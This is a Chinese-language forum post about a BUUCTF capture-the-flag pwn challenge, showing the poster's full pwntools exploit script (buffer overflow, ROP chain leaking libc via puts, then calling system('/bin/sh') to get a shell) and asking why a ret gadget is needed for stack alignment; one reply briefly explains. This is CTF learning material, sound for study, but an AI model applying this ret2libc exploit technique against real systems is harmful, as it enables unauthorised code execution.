本帖最后由 sweety 于 2021-9-9 21:38 编辑
原题地址:BUUCTF在线评测 (buuoj.cn)
这里是exp
from os import popen
from pwn import *
from LibcSearcher import *
context.log_level = 'debug'
#p = remote('node4.buuoj.cn',28554)
p = process('./pwn')
e = ELF("./pwn")
puts_plt_addr = e.plt['puts']
puts_got_addr = e.got['puts']
gets_got_addr = e.got['gets']
encrypt_addr = 0x4009a0
pop_rdi = 0x0000000000400c83
ret = 0x4006b9
p.recvuntil("choice!\n")
p.sendline("1")
payload = 'a'*88 + p64(pop_rdi) + p64(gets_got_addr) + p64(puts_plt_addr) + p64(encrypt_addr)
p.sendline(payload)
p.recvuntil("llllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll")
gets_addr = p.recvuntil("Input your Plaintext to be encrypted")[4:].split("\n")
print gets_addr[0]
gets_addr = u64(gets_addr[0].ljust(8,"\x00"))
print hex(gets_addr)
'''
libc = LibcSearcher("gets",gets_addr)
libc_base = gets_addr - libc.dump('gets')
system_addr = libc.dump("system") + libc_base
bin_addr = libc.dump("str_bin_sh") + libc_base
'''
libc = ELF("./libc.so")
libc_base = gets_addr - libc.symbols['gets']
system_addr = libc.symbols["system"] + libc_base
bin_addr = libc.search("/bin/sh").next() + libc_base
# payload = 'a'*88 + p64(pop_rdi) + p64(bin_addr) + p64(system_addr) 这是我写的payload
payload = 'a'*88 + p64(ret) + p64(pop_rdi) + p64(bin_addr) + p64(system_addr)
p.sendline(payload)
p.interactive()
看了一天不懂为什么需要栈平衡,而且为什么要用ret指令平衡,求助
roger已获得悬赏 1 荣耀+5 学币最佳答案
前面用到了堆栈,后面就要平栈,用ret平衡,有可能是他只找到了ret的指令片段,只要能对堆栈造成影响的指令都可以用来平衡堆栈
| 
发表于 2021-9-9 21:37:08
|
查看: 7243|
回复: 8
发表于 2021-9-10 09:48:29
发表于 2021-9-15 22:49:40
窥视卡
雷达卡
提升卡
置顶卡
关闭卡
开启卡
变色卡
千斤顶
照妖镜
